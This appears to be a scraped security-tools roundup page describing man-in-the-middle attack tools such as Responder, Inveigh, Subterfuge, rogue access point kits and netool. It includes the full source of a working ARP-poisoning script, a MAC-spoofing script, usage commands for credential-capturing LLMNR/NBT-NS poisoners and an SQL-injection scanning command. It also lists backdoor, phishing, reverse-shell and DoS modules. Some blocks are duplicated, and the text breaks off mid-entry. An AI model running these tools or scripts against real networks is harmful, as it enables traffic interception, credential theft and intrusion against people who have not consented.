MITM_Toolkit is A toolkit for automating MITM attack management with ettercap. This is a collection of scripts to assist with MITM attacks.
Incremental Poison:
This shell script accepts 3 arguments. The interface you are using (eth1, eth2, etc…), the number of concurrent hosts you want to poison, and the name of a directory you want to output the packet captures to. When launched, it will open a separate gnome-terminal (so you have to do it in the desktop interface), and will start poisoning. To move to the next batch, just hit the ‘q’ button on that interface and it will gracefully shutdown, re-ARP the hosts (to prevent disruption), and then launch the next set. While this is happening, everything is being dumped into an organized collection of log files. Currently the script assumes the gateway is on your /24 network (so should work out of the box 90% of the time). Will be updating to support more unusual cases as well.

Interface Incremental Poison

Pcap Parser:
This shell script accepts 1 argument. The argument describes the path to the output directory from Incremental Poison, which contains all of the pcap files from a poisoning attack. It passes these pcaps through Ettercap -r and PCredz to extract credentials from the captured traffic.

Pcap-Parser

Download : Mitm_Toolkit (62,9 KB)
Source : https://github.com/pan0pt1c0n

Latest Change v-2.2:
– Server; Fixed Harsh Parser variable typo.
– Tools; FindSMB2UPTime now working properly.
– packets.py; FindSMB2UPTime now working properly.

This tool is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior.

Responder On Windows XP/2003 Server/7/8.1

Responder On Unix Platform; MacOSX, Kali-Sana, Arch Linux, Debian, Ubuntu etc.. Intallation; using giit.

FEATURES
========

– Built-in SMB Auth server.
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP. Successfully tested from NT4 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4. This functionality is enabled by default when the tool is launched.

– Built-in MSSQL Auth server.
In order to redirect SQL Authentication to this tool, you will need to
set the option -r to 1(NBT-NS queries for SQL Server lookup are
using the Workstation Service name suffix) for systems older than
windows Vista (LLMNR will be used for Vista and higher). This server
supports NTLMv1, LMv2 hashes. This functionality was successfully tested
on Windows SQL Server 2005 & 2008.

– Built-in HTTP Auth server.
In order to redirect HTTP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
Note: This module also works for WebDav NTLM authentication issued from
Windows WebDav clients (WebClient).

– Built-in LDAP Auth server.
In order to redirect LDAP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server
was successfully tested on Windows Support tool “ldp” and LdapAdmin.

– Built-in FTP Auth server.
This module will collect FTP clear text credentials.

– Built-in small DNS server. This server will answer type A queries. This
is really handy when it’s combined with ARP spoofing.

– All hashes are printed to stdout and dumped in an unique file John
Jumbo compliant, using this format:
(SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt
The file will be located in the current folder.

– Responder will logs all its activity to a file Responder-Session.log.

– When the option -f is set to “On”, Responder will fingerprint every host who issued an LLMNR/NBT-NS query.
All capture modules still work while in fingerprint mode.

– Browser Listener finds the PDC in stealth mode.

– Icmp Redirect for MITM on Windows =< 5.2 Domain members. This attack combined with the DNS module is pretty effective.

USAGE
=====

Running this tool:

– python Responder.py [options]

Usage Example:

python Responder.py -i 10.20.30.40 -b 1 -r 0 -f On

Options List:

-h, –help show this help message and exit.

-i 10.20.30.40, –ip=10.20.30.40 The ip address to redirect the traffic to.
(usually yours)

-b 0, –basic=0 Set this to 1 if you want to return a
Basic HTTP authentication. 0 will return
an NTLM authentication.

-s Off, –http=Off Set this to On or Off to start/stop the
HTTP server. Default value is On.

-S Off, –smb=Off Set this to On or Off to start/stop the
SMB server. Default value is On.

-q Off, –sql=Off Set this to On or Off to start/stop the
SQL server. Default value is On.

-r 0, –wredir=0 Set this to enable answers for netbios
wredir suffix queries. Answering to wredir
will likely break stuff on the network
(like classics ‘nbns spoofer’ will).
Default value is therefore set to Off (0).

-c 1122334455667788, –challenge= The server challenge to set for NTLM
authentication. If not set, then defaults
to 1122334455667788, the most common
challenge for existing Rainbow Tables.

-l file.log, –logfile=filename.log Log file to use for Responder session.

-f Off, –fingerprint=Off This option allows you to fingerprint a
host that issued an NBT-NS or LLMNR query.

-F On, –ftp=On Set this to On or Off to start/stop the FTP server.
Default value is On

-L On, –ldap=On Set this to On or Off to start/stop the LDAP server.
Default value is On

-D On, –dns=On Set this to On or Off to start/stop the DNS server.
Default value is On

Download version : Responder.zip(96.9 KB)
source : https://github.com/SpiderLabs/Responder | http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
Our post Before : http://seclist.us/updates-responder-v-2-1-3-is-a-llmnr-and-nbt-ns-poisoner.html

Changelog Version 1.0.1 – Superfish!
+ Subterfuge can now MITM SSL sessions using arbitrary certificates
+ SSLStriping can be selectively enabled or disabled as desired
+ Subterfuge can leverage the Superfish Bug
+ CRITICAL UPDATE: The new version of Django was causing Subterfuge to fail on default installs of Kali Linux. Subterfuge 1.0.1 release with emergency fixes to critical framework files

Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network and even exploiting machines by injecting malicious code directly into their browsing sessions.

a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot.

Installation
Follow the steps below to download and install the latest version of Subterfuge:

git clone https://github.com/Subterfuge-Framework/Subterfuge.git
cd Subterfuge
python setup.py

Execute Subterfuge by running the following command: subterfuge

Our Post Before | Source : http://kinozoa.com/blog/subterfuge/

is ARP MiTM Captive Portal.
With main Menu:
1. Captive Portal – Log In Creds / Reverse Shell
2. Captive Portal – Log In Creds / Reverse Shell with DNS Spoof
3. SMB – Hash Grab
4. SMB – Hash Relay
5. Web – Beef Hook
6. Web – SSL Strip and Capture Traffic
7. Web – BDFproxy/BDFfactory
8. Web – Hamster/Ferret

ARP MiTM Captive Portal

Captive Portal – HTA Reverse Shell:
1. Cisco
2. Microsoft Forefront
3. Sophos
4. SQUID
5. TrendMicro
6. Fortigate\Fortinet
7. Flash Updater
8. Forttinet – Old Style
9. Custom

Reverse Shell Menu

Installation:
– git clone https://github.com/CroweCybersecurity/MiTM-CaptivePortal.git
– cd MiTM-CaptivePortal
– chmod +x
– run “./mitm-portal.sh
Thi Script has been tested on Kali-Sana 2.0 Desktop or in VMWare Machine.

Source : https://github.com/CroweCybersecurity

Changelog 21/09/2015:
+ Updated the SMB relay add user example
The old generic add user example would not work on a system with complex password requirements. Added an actual username and password to avoid confusion.

Inveigh

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB attacks, VLAN pivoting, or even restrictions from the client.

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Notes:
– Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
– LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
– SMB challenge/response captures are performed by sniffing over the host system’s SMB service.
– HTTP challenge/response captures are performed with a dedicated listener.
– The local LLMNR/NBNS services do not need to be disabled on the host system.
– LLMNR/NBNS spoofer will point victims to host system’s SMB service, keep account lockout scenarios in mind.
– Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
– Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
– Output files will be created in current working directory.
– If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
– Code is proof of concept level and may not work under some scenarios.

Usage :
Obtain an elevated administrator or SYSTEM shell. If necessary, execute Set-ExecutionPolicy Unrestricted within PowerShell.
To execute with default settings:

Inveigh.ps1 -i localip

To execute with features enabled/disabled:

Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -SMB Y/N

Download: Master.zip  | Clone Url | Our Post Before
Source : https://github.com/Kevin-Robertson

BUG FIXES 23/9/2015:
+ Wireless Evil Access Point traffic redirect
+ Fixed WPA2 Cracking
+ Fixed Infernal Wireles
+ Fixed Free AP
+ Check for requirements
+ DB implementation via config file
+ Improved Catch and error
+ Check for requirements
+ Works with Kali 2
CHANGES:
+ Improved compatibility
+ Report improvement
+ Better NAT Rules

infernal-twin is a wireless security asessment tools.

infernal twin – wireless security assesment tools

NEW FEATURES:
GUI Wireless security assessment SUIT
+ Impelemented
— WPA2 hacking
— WEP Hacking
— WPA2 Enterprise hacking
— Wireless Social Engineering
— SSL Strip
— Report generation
— PDF Report
— HTML Report
— Note taking function
— Data is saved into Database
— Network mapping
— MiTM
— Probe Request

Installation:
– git clone https://github.com/entropy1337/infernal-twin
– cd infernal-twin
– python setup.py
– configure your mysqldb
– python InfernalWireless.py (from the same folder where you codes exist) FOR RUN THIS SCRIPT.

Source : https://github.com/entropy1337

scapyarpspoof is a Simple effective and useful ARP spoofer script with scapy.
This will arpspoof x.x.x.5 on your network sending requests to the target and replies to the router. Classic MiTM using ARP packets.

Usage:

This Script run Smoothly on Ubuntu, All Debian, Arch Linux, Kali-Sana.

Example Attack

arpspoof.py Script:

#!/usr/bin/env python
#
# arpspoof.py - simple effective scapy ARP spoofer
#  thed4rkcat@yandex.com
#
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 2 of the License, or
## (at your option) any later version.
#
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License at (http://www.gnu.org/licenses/) for
## more details.

from netifaces import gateways, AF_INET, AF_LINK, ifaddresses
from scapy.all import *
from time import sleep
from os import popen
from re import match
from argparse import ArgumentParser

def fvalidip(ip):
	if match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
		return ip
	else:
		return False

def fvalidmac(mac):
	if match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", mac.lower()):
		return mac
	else:
		return False

def fgetmac(ip):
	popen('ping %s -c 1' % ip).read()
	mac = popen("arp -a | grep '(%s)' | cut -d 't' -f 2 | cut -d ' ' -f 2" %(ip)).read().strip()
	return fvalidmac(mac)

def fownmac():
	def_gw_device = gateways()['default'][AF_INET][1]
	mac = ifaddresses(def_gw_device)[AF_LINK][0]['addr']
	return fvalidmac(mac)

def ffix():
	for target in targetlist:
		targetip = target[0]
		targetmac = target[1]
		resettarget=ARP(op=1,psrc=routerip,pdst=targetip,hwdst=targetmac, hwsrc=routermac)
		resetrouter=ARP(op=2,psrc=targetip,pdst=routerip,hwdst=routermac, hwsrc=targetmac)
		send(resetrouter, count=4, verbose=False)
		send(resettarget, count=4, verbose=False)
		print ' [*] Fixed ARP tables for %s' % targetip
	if not args.mac:
		popen("echo 0 > /proc/sys/net/ipv4/ip_forward").read()

parser = ArgumentParser(prog='arpspoof', usage='./arpspoof.py [options]')
parser.add_argument('-t', "--targets", type=str, help='Target IP extensions eg. 13,215,23')
parser.add_argument('-m', "--mac", type=str, help='Spoof to user defined MAC.')
parser.add_argument('-r', "--replies", action="store_true", help='Use ARP replies instead of requests.')
parser.add_argument('-n', "--norouter", action="store_true", help='Only poison the target, not the router.')
parser.add_argument('-f', "--nofix", action="store_true", help="Don't fix ARP tables after poison.")
args = parser.parse_args()
ismitm = ''

routerip = gateways()['default'].values()[0][0]
if fvalidip(routerip):
	network = '.'.join(routerip.split('.')[:3])
else:
	print " [X] Error detecting the router IP, got: %s" % routerip
	exit()

try:
	targets = args.targets.split(',')
except:
	parser.print_help()
	exit()

routermac = fgetmac(routerip)
if routermac:
	print " [*] Detected router: %s (%s)" % (routerip, routermac)
else:
	print " [X] Error detecting the router MAC, got: %s" % routermac
	exit()
	
ownmac = fownmac()
if not ownmac:
	print " [X] Error detecting our own MAC, got: %s" % ownmac
	exit()

if args.mac:
	spoofmac = args.mac
	if not fvalidmac(spoofmac):
		print " [X] Your user defined spoof MAC is not valid, got: %s" % spoofmac
		exit()
else:
	spoofmac = ownmac
	popen("echo 1 > /proc/sys/net/ipv4/ip_forward").read()
	ismitm = ' (MiTM)'

targetlist = []
for target in targets:
	targetip = '%s.%s' % (network, target)
	targetmac = fgetmac(targetip)
	if targetmac:
		print " [*] Detected target: %s (%s)" % (targetip, targetmac)
		targetlist.append([targetip, targetmac])
	else:
		print ' [X] Error: No MAC for %s found, skipping' % (targetip)

if args.replies:
	targetop = 2
	print " [*] Using ARP replies."
else:
	targetop = 1
	print " [*] Using ARP requests."

print " [*] Spoofing to: %s%s" % (spoofmac, ismitm)
print " [*] Attacking."

try:
	while True:
		for target in targetlist:
			targetip = target[0]
			targetmac = target[1]
			poisontarget=ARP(op=targetop,psrc=routerip,pdst=targetip,hwdst=targetmac, hwsrc=spoofmac)
			poisonrouter=ARP(op=2,psrc=targetip,pdst=routerip,hwdst=routermac, hwsrc=spoofmac)
			if args.norouter:
				send(poisontarget, verbose=False)
			else:
				send(poisonrouter, verbose=False)
				send(poisontarget, verbose=False)

		sleep(1.5)

except:
	print
	if args.nofix:
		print ' [*] Leaving ARP tables poisoned..'
	else:
		print ' [*] Fixing ARP tables..'
		ffix()

Source : https://github.com/d4rkcat

Deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router.

example usage

latest change 9/26/2015 :Modularization
requirements:
+ DPKT
+ pypcap
TODO:
– Multiple hosts denying
– DNS spoofing with redirect
– Scan mode

Download : creak.zip(19.5 KB)
Source : https://github.com/codepr

Changelog v0.0.2 – 2015-09-29:
+## Added
+- DNS spoofing
+- Manufacturer based mac spoof
+- Basic scan mode for active sessions on target machine
+## Changed
+- Random mac address generation
+- Better arp poison system, delay added
+## Fixed
+- Mac address spoofing

Deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router.

example usage

latest change 9/26/2015 :Modularization
requirements:
+ DPKT
+ pypcap
TODO:
– Multiple hosts denying
– DNS spoofing with redirect
– Scan mode

Download : creak.zip(19.5 KB)
Source : https://github.com/codepr

Invoke is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP(S)/SMB and NTLMv2 HTTP to SMB relay.
DESCRIPTION:
Invoke is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.

Module version of Inveigh

~ Parameter ~
.PARAMETER IP
Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the ‘SpoofIP’ parameter is not set.
.PARAMETER SpooferIP
Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to another system.
.PARAMETER HTTP
Default = Enabled: Enable/Disable HTTP challenge/response capture.
.PARAMETER HTTPS
Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
If the script does not exit gracefully, execute “netsh http delete sslcert ipport=0.0.0.0:443” and manually remove the certificate from “Local Computer\Personal” in the cert store.
.PARAMETER SMB
Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system’s SMB server.
.PARAMETER LLMNR
Default = Enabled: Enable/Disable LLMNR spoofing.
.PARAMETER NBNS
Default = Disabled: Enable/Disable NBNS spoofing.
.PARAMETER NBNSTypes
Default = 20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
.PARAMETER Challenge
Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
.PARAMETER SMBRelay
Default = Disabled: Enable/Disable SMB relay.
.PARAMETER SMBRelayTarget
IP address of system to target for SMB relay.
.PARAMETER SMBRelayCommand
Command to execute on SMB relay target.
.PARAMETER SMBRelayUsernames
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts either just the username of domain\username format.
.PARAMETER SMBRelayAutoDisable
Default = Enable: Automaticaly disable SMB relay after a successful command execution on target.
.PARAMETER SMBRelayNetworkTimeout
Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
.PARAMETER Repeat
Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
.PARAMETER ForceWPADAuth
Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
.PARAMETER ConsolePrompt
Default = Enabled: Enable/Disable the console prompt.
.PARAMETER RunTime
Set the run time duration in minutes. Note that leaving the Inveigh console open will prevent Inveigh from exiting once the set run time is reached.
.PARAMETER ConsoleOutput
Default = Console Output Disabled: Enable/Disable realtime console output.
.PARAMETER FileOutput
Default = File Output Disabled: Enable/Disable realtime file output.
.PARAMETER OutputDir
Default = Working Directory: Set an output directory for log and capture files.
.PARAMETER ShowHelp
Default = Enabled: Enable/Disable the help messages at startup.

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Notes:
– Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
– LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
– SMB challenge/response captures are performed by sniffing over the host system’s SMB service.
– HTTP challenge/response captures are performed with a dedicated listener.
– The local LLMNR/NBNS services do not need to be disabled on the host system.
– LLMNR/NBNS spoofer will point victims to host system’s SMB service, keep account lockout scenarios in mind.
– Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
– Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
– Output files will be created in current working directory.
– If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
– Code is proof of concept level and may not work under some scenarios.

Usage :
Obtain an elevated administrator or SYSTEM shell. If necessary, execute Set-ExecutionPolicy Unrestricted within PowerShell.
To execute with default settings:

Inveigh.ps1 -i localip

To execute with features enabled/disabled:

Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -SMB Y/N

Download: Master.zip  | Clone Url | Our Post Before
Source : https://github.com/Kevin-Robertson

Changelog v-0.6.7:
+ added Probe Request discovery mac Devices
+ added plugins options
+ added PopUpServer options
+ added Java Update Fake
+ code improvements
+ fixed small bugs
— phishing error directory
— fixed resolve host select adpter
— fixed rules iptables redirect
— fixed arp posion cache

3vilTwinAttacker is security tool that provide the Rogue access point to Man-In-The-Middle and network attacks. purporting to provide wireless Internet services, but snooping on the traffic. can be used to capture of credentials of unsuspecting users by either snooping the communication by phishing.

Dependencies:
– python-qt4
– python-scapy
– python-nmap (optional)
– python-BeautifulSoup
– airbase-ng (include in aircrack-ng)
– isc-dhcp-server

Features:
– Rouge Wi-Fi Access Point
– Deauth Clients AP
– Probe Request Monitor
– DHCP Starvation Attack
– Crendentials Monitor
– Windows Update Attack
– Templates phishing
– Dump credentials phishing
– Support airodump sacan
– Support mkd3 deauth
– beef hook support
– Report Logs html
– Mac Changer
– ARP Posion
– DNS Spoof
– Plugins
— net-creds
— sslstrip
– Tools
— ettercap
— driftnet

Download : v0.6.7.zip  | v0.6.7.tar.gz
Source : https://github.com/P0cL4bs | Our Post Before

Changelog v-2.4.0 10/16/2015:
+ Added better root checks.
Many users complained that Network Spoofer didn’t work on Android 5.1. Most had root disabled. This adds extra checks.

Network Spoofer lets you change websites on other people’s computers from an Android phone.

Features include:
+ Flip pictures upside down
+ Flip text upside down
+ Make websites experience gravity
+ Redirect websites to other pages
+ Delete random words from websites
+ Replace words on websites with others
+ Change all pictures to Trollface
+ Wobble all pictures / graphics around a bit

Network Spoofer lets you change websites on other people’s computers from an Android phone.

Disclaimer:
Please note that there is no intention for Network Spoofer to include any malicious features. This application is a fun demonstration of how vulnerable home networks are to simple attacks, with permission of the network owner – DO NOT attempt to use Network Spoofer on any corporate or other non-residential networks (eg. at school, university). It becomes very obvious when Network Spoofer is being used on a Network, and use of Network Spoofer will be considered malicious hacking by network administrators.

Requirements
Network Spoofer runs on Android devices with the following requirements:
– Which are rooted (‘su’).
– Which has Wifi
The first can be obtained by using a custom firmware such as CyanogenMod. Alternatively search on the internet for instructions on how to root your phone.

Download:
android-netspoof-2.4.0.apk | Zipball | Tarball
Source : http://www.digitalsquid.co.uk/netspoof/
Old post: http://seclist.us/updates-android-network-spoofer-v-2-3-0.html

Changelog v-4.5 .2:
+ UPGRADE => msfcli replaced by msfconsole
+ netool.sh => “added” file selection GUI -> zenity displays
+ priv8.sh => “added” MitM DLINK phishing -> capture routers creds
+ priv8.sh => “added” adobe_flash_hacking_team_uaf -> mitm+dns_spoof
+ INSTALL.sh => “added” build shortcut to toolkit -> gnome-desktop-item-edit
* netool.sh => “improved” input interface in use bug-fixed -> ettercap modules
* priv8.sh => “bug-fixed” ettercap IPV6 bug-fixed -> target selection /// ///
* priv8.sh => “improved” java.jar phishing -> download using pishishing webpage or direct URL execute…

Scanning – Sniffing – Social Engeneering”

Netool: its a toolkit written using ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address.

Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM(phishing – social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage.

Recently was introduced “inurlbr” webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag –comand-vul)

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Features (Modules) :

"1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        <-
  "3-Open router config"       
  "4-Ip tracer whois"
  "5-firefox webcrawler addon"                           
  "6-Retrieve metadata"
        ->
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        <-
  "7-INURLBR.php (webcrawler)"
        -> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
        <-
  "8-r00tsect0r automated exploits (phishing - social engeneering)"
        ->
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylooger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstarpped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embedded a payload into a world document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a lisenner [multi-handler]
        <-
  "9-Config ettercap"         
  "10-Launch MitM"            
  "11-Show URLs visited"       
  "12-Sniff remote pics"
  "13-Sniff SSL passwords"      
  "14-Dns-Spoofing"
  "15-Share files on lan"   
  "16-DoS attack {local}"      
  "17-Compile etter.filters"    
  "18-execute ettercap filter"
  "19-Common user password profiler [cupp.py]"

  d. delete lock folders
  a. about netool
  u. check for updates
  c. config toolkit
 db. access database
  q. quit

Download :
opensource.tar.gz (26.5 MB)
opensource[kali].tar.gz (26.5 MB)
Our Post Before  | Source : http://sourceforge.net/projects/netoolsh/

MCfly is an interactive tool for Linux that spoofs MAC addresses in a given interval.
Script :

import uuid, re, random, os, subprocess, time, threading, sys, string
from colorama import init

###Colors###
init(autoreset=True)
white = '\x1B[37m';dgray = '\x1b[90m';DGRAY = '\x1b[100m';lred = '\x1b[91m';LRED = '\x1b[101m';lgreen = '\x1b[92m';LGREEN = '\x1b[102m';lyellow = '\x1b[93m';LYELLOW = '\x1b[103m';lblue = '\x1b[94m';LBLUE = '\x1b[104m';lmagenta = '\x1b[95m';LMAGENTA = '\x1b[105m';lcyan = '\x1b[96m';LCYAN = '\x1b[106m';lgray = '\x1b[97m';LGRAY = '\x1b[107m';BOLD = '\x1B[1m'

###Art###
print lyellow + '''
   ___           __         
  / _ )___ _____/ /__       
 / _  / _ `/ __/  '_/       
/____/\_,_/\__/_/\_\        
/_  __/__/_  __/ /  ___     
 / / / _ \/ / / _ \/ -_)    
/_/__\___/_/_/_//_/\__/     
  / __/_ __/ /___ _________ 
 / _// // / __/ // / __/ -_)
/_/  \_,_/\__/\_,_/_/  \__/ 
MCfly is an interactive program that spoofs 
MAC addresses in a given interval.
Author is not responsible to any damage caused
by this program
KittySec(C)                            
'''

###List of vendor MAC prefix
vendors = ['00:05:9A', '00:19:56', '00:02:B3', '00:00:C6', '00:11:11', '00:48:54'] 

def countdown(t):
	while t:	
	      	mins, secs = divmod(t, 60)
       		timeformat = '{:02d}:{:02d}'.format(mins, secs)
		sys.stdout.write(lmagenta + '\r' + '[info]' + white + ' Next spoof in: ' + str(timeformat).strip('\'\(\)') + ' seconds\r')
		sys.stdout.flush()
	       	time.sleep(1)
	        t -= 1
	       
def rand(size=2, chars=string.hexdigits):
	return str(''.join(random.choice(chars) for _ in range(size)))

def generateMAC():
	randomMAC = random.choice(vendors) + ':' + rand() + ':' + rand() + ':' + rand()
	return str(randomMAC).upper()

def spoofMAC(iface, interval):
	threading.Timer(interval, spoofMAC, [iface, interval]).start()
	try:
		#Parse ifconfig
		generatedMAC = generateMAC()
		cmd = 'ifconfig ' + str(iface) + ' hw ether ' + generatedMAC
		os.system(cmd)
		spoofedMAC = str(subprocess.check_output(['ifconfig'])).split('HWaddr')
		spoofedMAC = spoofedMAC[1].split(' ')
		spoofedMAC = spoofedMAC[1]
	
		#Check for successful spoofing
		if spoofedMAC.upper() == generatedMAC:
			print lgreen + '[+]' + ' Spoofed MAC address to ' + generatedMAC
			countdown(interval)
		else:
			print lred + '[-] There was an error'
	except Exception, e:
		print lred + '[-] Error ' + str(e)


originalMAC = str(':'.join(re.findall('..', '%012x' % uuid.getnode()))).upper()
print lmagenta + '[info] ' + white + 'Original MAC address is: ' + originalMAC

#List available interfaces
availIfaces = str(os.listdir('/sys/class/net/'))

#Take user input
iface = str(raw_input(lyellow + '[?] Choose interface: ' + availIfaces + '\n'))
interval = int(raw_input(lyellow + '[?] Each how many minutes would you like to spoof to a newer MAC address?\n'))
interval = interval * 60
spoofMAC(iface, interval)

Source : https://github.com/kittysec

Latest Change :
+ SMB relay fix: some hard coded packet data that needed to be dynamic.
+ Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution.

Invoke-InveighRelay is the main Inveigh SMB relay function.

Invoke is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP(S)/SMB and NTLMv2 HTTP to SMB relay.
DESCRIPTION:
Invoke is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.

Module version of Inveigh

~ Parameter ~
.PARAMETER IP
Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the ‘SpoofIP’ parameter is not set.
.PARAMETER SpooferIP
Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to another system.
.PARAMETER HTTP
Default = Enabled: Enable/Disable HTTP challenge/response capture.
.PARAMETER HTTPS
Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
If the script does not exit gracefully, execute “netsh http delete sslcert ipport=0.0.0.0:443” and manually remove the certificate from “Local Computer\Personal” in the cert store.
.PARAMETER SMB
